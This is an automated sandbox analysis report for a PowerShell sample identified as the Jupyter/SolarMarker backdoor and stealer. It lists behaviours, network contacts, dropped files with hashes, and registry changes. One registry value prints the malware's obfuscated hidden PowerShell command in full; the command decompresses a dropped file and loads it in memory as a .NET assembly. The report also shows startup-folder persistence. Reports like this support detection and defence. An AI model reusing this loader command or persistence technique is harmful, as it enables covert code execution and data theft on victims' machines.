Malware Analysis Report

2024-10-16 02:55

Sample ID: 230413-rrz1psdc8t
Target: script.ps1
SHA256: 5a2366fb3d365e87f77a982d83eefb5054d50e8e73d2043979e5616c7071a458
Tags: jupyter backdoor stealer trojan
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10

SHA256: 5a2366fb3d365e87f77a982d83eefb5054d50e8e73d2043979e5616c7071a458

Threat Level: Known bad

The file script.ps1 was found to be: Known bad.

Malicious Activity Summary

jupyter backdoor stealer trojan

Jupyter Backdoor/Client payload

Jupyter, SolarMarker

Blocklisted process makes network request

Drops startup file

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported: 2023-04-13 14:26

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2023-04-13 14:26
Reported: 2023-04-13 14:37
Platform: win10-20230220-en
Max time kernel: 642s
Max time network: 653s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\script.ps1

Signatures

Jupyter Backdoor/Client payload

Description Indicator Process Target
N/A N/A N/A N/A

Jupyter, SolarMarker

backdoor trojan stealer jupyter

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (21 identical events)

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\MICrosoft\WIndoWs\STARt meNU\pROgraMs\STArTUP\a666a8fda214cd9238e7fd9c62da9.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\.zgfdlkdwjy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\.zgfdlkdwjy\ = "nfivyqigfpw" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\nfivyqigfpw\shell\open\command C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\nfivyqigfpw C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\nfivyqigfpw\shell C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\nfivyqigfpw\shell\open C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\nfivyqigfpw\shell\open\command\ = "poweRsHeLl -WIndOwsTYlE hiDdeN -Ep BYPass -cOMMand \"[sYStem.RefLeCtIoN.AsSembly]::loaD({$a0aa7c41ff34f981c548499da1e4a=NEw-oBJECT syStEm.iO.MemorYSTREAm(, $aRgS[0]);$a42eb79b0134e6981a8104636b9ca=NeW-OBjECt sYSTEM.iO.mEmorYsTrEam;$ad54b764e9845ab4de9dea2a69505=nEW-oBJecT SyStem.iO.COMPReSsiON.GZIPStREAm $a0aa7c41ff34f981c548499da1e4a, ([iO.cOmpreSsiOn.COmprESSIoNMOdE]::dEcOmpReSs);$ad54b764e9845ab4de9dea2a69505.CoPytO($a42eb79b0134e6981a8104636b9ca);$ad54b764e9845ab4de9dea2a69505.cLosE();$a0aa7c41ff34f981c548499da1e4a.ClosE();retuRn $a42eb79b0134e6981a8104636b9ca.tOaRraY();}.iNvOke([SysTeM.io.FiLe]::readalLbYTes('C:\\Users\\Admin\\AppData\\Roaming\\AdOBE\\IUAhWSYnwacetBJkHpG\\JYrgHGeXzFaift.YLMrkBnbRWCVeEFGZ')));[a0cb94b33de41cafdb3b130fc96f7.a1dc1fc073f4b6be3d290facb90f5]::a2197eb87d64aa8dada0c2f713e48()\"" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\script.ps1

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lajkrkag\lajkrkag.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES618D.tmp" "c:\Users\Admin\AppData\Local\Temp\lajkrkag\CSC8B4757A9AC8448BA5D5FEBD2A61AC.TMP"

Network

Country Destination Domain Proto (repeated consecutive rows collapsed, order preserved)
DE 37.221.114.23:80 tcp (x1)
JP 40.74.98.192:443 tcp
US 8.8.8.8:53 62.13.109.52.in-addr.arpa udp
DE 37.221.114.23:80 tcp (x9)
US 8.8.8.8:53 126.24.238.8.in-addr.arpa udp
US 8.8.8.8:53 1.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
DE 37.221.114.23:80 tcp (x11)

Files

memory/4452-125-0x000001C947260000-0x000001C947282000-memory.dmp

memory/4452-127-0x000001C92CD00000-0x000001C92CD10000-memory.dmp

memory/4452-128-0x000001C92CD00000-0x000001C92CD10000-memory.dmp

memory/4452-132-0x000001C947390000-0x000001C947406000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gayoq4ud.szc.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

\??\c:\Users\Admin\AppData\Local\Temp\lajkrkag\lajkrkag.cmdline

MD5 b82b3c610b1bd22fea2daca6e6fcbaea
SHA1 6f18be10592e3d1a4da6343ddcac726f9329ac4f
SHA256 16319d856ba93120b0e55efcfe44abadc942751e8afb5956d5ddc5a535489e5e
SHA512 7246e8d7b9f86dc034fa5ef5f28547c08a6f6394a8b18002b2c0dc04709aaf3d12bd42600f1c3a0d17efd410ee7f993f493eaac35d034ed60a8d566159ddddf9

\??\c:\Users\Admin\AppData\Local\Temp\lajkrkag\lajkrkag.0.cs

MD5 dae076349c85f1ed8db78fd3bd75473c
SHA1 33be9fc7f764edae76f95fe28f452b740a75d809
SHA256 9e3f4a1c1286b86413b4844e216248f1a95e8a13ee74c2c71412c2d6c571f156
SHA512 ae396e869013c2c70936858646aeac2289b17c16a4f2a6b938d6d2434a30e9785e010ff3c42b9c728cd8c002ea4c8190783665f575e15962553eb7b229b9a923

\??\c:\Users\Admin\AppData\Local\Temp\lajkrkag\CSC8B4757A9AC8448BA5D5FEBD2A61AC.TMP

MD5 244e097abf9183ad1e323ed52c620503
SHA1 be6815fe1b4930e5ccf4ea9477b61938b36f4c67
SHA256 5455ec4c2d6b5f5dba18ec1d2870ec3d47ad993174f0f21e19fb0a6e502f60d6
SHA512 2e61664cd3b946c133bd6dcc7adbc000dfb51f90964e0c7b6c91ca4f8fc2e683c946a3bd62c76d3237ca5f4ddd66bce277aea4dd788c10a62155d5d72ffced07

C:\Users\Admin\AppData\Local\Temp\RES618D.tmp

MD5 90f78bb940a4b01dda650b86097b948b
SHA1 e3828a76059b8a7a5a197da0cde7acac6ec79c23
SHA256 4c94e3efadc2a9674a3082ce77f8b5e441da143149315c15058ab37703d73ea1
SHA512 7889708aea0ef18425f5b10328354b7199119f85dbc3eaef01ce2e7bbcf5019f6ab5fc75b853560c570ca315c46f0a65c3c89742b16846ad14a92dee07030eec

C:\Users\Admin\AppData\Local\Temp\lajkrkag\lajkrkag.dll

MD5 73520d2b97645d9989fb0f5bb1aba355
SHA1 84ece3730dcdc6ae9dc336f397f43d1ec61dbce6
SHA256 d39562cabdf944a784e353b60c0e9ecbccb0102ff718aae74e0ef38b2efcdefa
SHA512 478138a3b2a427d07c99aae399e79eadbeb66386f5d5dc5d8b8c2883fe8536ad3ed0583f10eed5a8254bebd863c130f19c61341f0a4a86e1387fae90949b07ba

memory/4452-159-0x000001C9471A0000-0x000001C9471A8000-memory.dmp

memory/4452-194-0x000001C92CD00000-0x000001C92CD10000-memory.dmp

C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\DKgktXvNZPFr.RGQqJyjbphVErkPTA

MD5 27ae639baac5a409329887445c77646f
SHA1 8870aca8b8b0972c72f6ed23b07556ac83439558
SHA256 555d9fab18e5be0bffcb8cb097286be783bf4c8479b71cc33e382743c686ed54
SHA512 7434209a5e41842148d17c051c8ea17492b7949bcca5bc1334fb82f744bfbb449648f601ae805fd21efe04749d0e335c68d288add0a79566b24051096ff6e2c0

C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\zNadBQkwFgH.BYydUsvQFngElaxMeNt

MD5 0dd9a25dc9e735a89b895f1fe87633ff
SHA1 91bdb2d46c6d96b97032e6726e896fcffd3fa1fb
SHA256 b7a430f41cabcf2d1cc9905c7db08887a8f8861f9a98cd097762272412760ec6
SHA512 1922bb2d7a371ad0b5a1470df88eb3a0b934ed1e361d0c05900f08b04d2aeb13e6cdd585ea0a2a027067572ea90e3ca4b514b01fa927e6a2e86eaf168f083f3d

C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\MlUejLxHGgWDzqpS.VAMEOGeaouZvLrFcht

MD5 1139720144032052eb01c6741a039197
SHA1 5f1425d9261ec400d90743a91f5fe9674caa5c4d
SHA256 0d3805f498980feb2c2b247990fee00b217609850bb892be1ed2af3588577434
SHA512 928987d79463fdf02a65629089b7d8f8891b1e356e8e475799ec1554ef9f84bf0faa455f8fa460f87e9a6ef26510a324380e4515a11f974117e55750bb01f09a

C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\yeIhBUKQbW.iStXzqQUYKaDCn

MD5 16367ac998221144710b9ffd6d031b17
SHA1 699746b2bf59a22205f4882b0528190b08ada96d
SHA256 14079a86451292bda035cc4cd17638b4ef4edaa4a6ced9d81b1f10a1377607de
SHA512 51452d16ff6b632d8c3982a2dba2de63c6fc386010c7a6fbbfca2c93af5e47460d717296b2c940618e5b7c15314d4b419bbadfacfbe8db55fb582e22c98c21e3

C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\jbohTScZsKkXNRuzQ.UsadtGHOvVqoukKhPcW

MD5 e155224cda1a9854fe57af90bcb5b475
SHA1 d8030992f15f0aba20e51bce03cfd58b0be4df88
SHA256 7ca9fcf2fbbc599995b31849698b909602e8cacd501f4bfbfa3ca7d0e504b028
SHA512 e00a6202a841bd1d6180a62ccade7340cb4ac1ecf7829bc64d60909f9c5ce8f8b2720155676a41833149efa586343811d9fb897fb3d504b33f25929a4a11db78

C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\ASZQaXouDB.RkaAzwDjeUdspfto

MD5 acb79c1192de5be950567a971a40b5b9
SHA1 a19d8aad3dd2ef9560489972141be7d78e5d04b1
SHA256 01b4f03cb41dc3881dd052e466b528ac7073661aeef24596f480614fa7eb8e32
SHA512 88fa9bdcfa5ac8a81e36191e0bbb159b4bbd66a4f7bd26c28891bd76b68cfccb12f1989ff6772f792812d0c11ee82b9cc274a2a2ccebdf5bfde0747aaaaa593d

C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\AFqJfBoXcuCSZtsT.YoiMWFrqHSLzjkCexb

MD5 67502090d0cf262d4a14c19dfe69f524
SHA1 9b87390eed9e8afdf246e9148022244277ef5b13
SHA256 07fef04ad77fe166172937b8e9e38c2a9558a5c9da152f8430e122b54e7d83de
SHA512 2af2fb8620e95c04c2c6011370c6b5ee581cd91a04415a79f8f355baa59c6a682148c810a769bedd73d510c67d48921831d68fcc22c4eb8ae63ca09f7f339556

C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\oUbxfLjgKmXrdcT.FfHSadwzqrZTLg

MD5 a30104996081729cabdca7b08655e843
SHA1 dbc4fd5547f6d8c5365d7d6cca65d44647d868ba
SHA256 f3e32db459cab4f0db05919cc9f0652caf6eeaeeca25af82e843c7282f473ded
SHA512 68f7d7061acd8b367a7d44c9a20462621628c8d948d80c663ff8d16cba1edf7313001aec4591e39b5c7580b6dea675b673b4755915d2078886f1d85b65bf3257

C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\LnerWMBgjOSDcPliyzT.VtcNxBAgkWa

MD5 e2ff7820f8b7579747a670419a3aa125
SHA1 c09f64cd5dc0513804d6bebcb1c8c006c73fcc82
SHA256 7dabd2c07f0659c4eac0213a444e1ee2d587233858ce57edafa5ac381cb5b662
SHA512 f28882cff20694499f5a44d1bb2c80a127d57a21015dd855bcc9223630095ed8410ec63a3c8441b6f4112a848fc9868e7d8ab9b1d8a5af74fa1443bae41015a1

C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\bBVJEpqwhSOFXIGYm.uHSbcxtRyWIhlps

MD5 a057f748414f4673fe67793265d72453
SHA1 e856da5a9a93b6e7f02e9aec8459dc1b471abca3
SHA256 440714233f9df4549f0a6821152a74f8fb6f31519637cbfc9c2a71692f93cc80
SHA512 a27a17edee733605754fdbdee955a606d5c0544eed7e14fa6d82da83e1808ec306a67e490c4d1b140f374ecb532943048b9b7476a0ef3d7b7630014174c78121

C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\ftTzqRAwCP.rckJNulozCVsPaMX

MD5 93035478adf3b3aafdd26edfd09b53b3
SHA1 79c924286ddb2e1d3f808437d777b06f061bb737
SHA256 449161c6e76077628f02136ecc85b324a8a95aa59db6514607c157b7b7e3c9b1
SHA512 5c56c022a828933f79c827f1cebc9111976d92454ae2b6ff5672f05bf672dcd649d852e33678bae5e5f1260152439d094cc1c1e2ba6de999bcb475e5442b72b2

memory/4452-362-0x000001C9471E0000-0x000001C9471F2000-memory.dmp

memory/4452-367-0x000001C92CD00000-0x000001C92CD10000-memory.dmp

memory/4452-368-0x000001C92CD00000-0x000001C92CD10000-memory.dmp

memory/4452-369-0x000001C92CD00000-0x000001C92CD10000-memory.dmp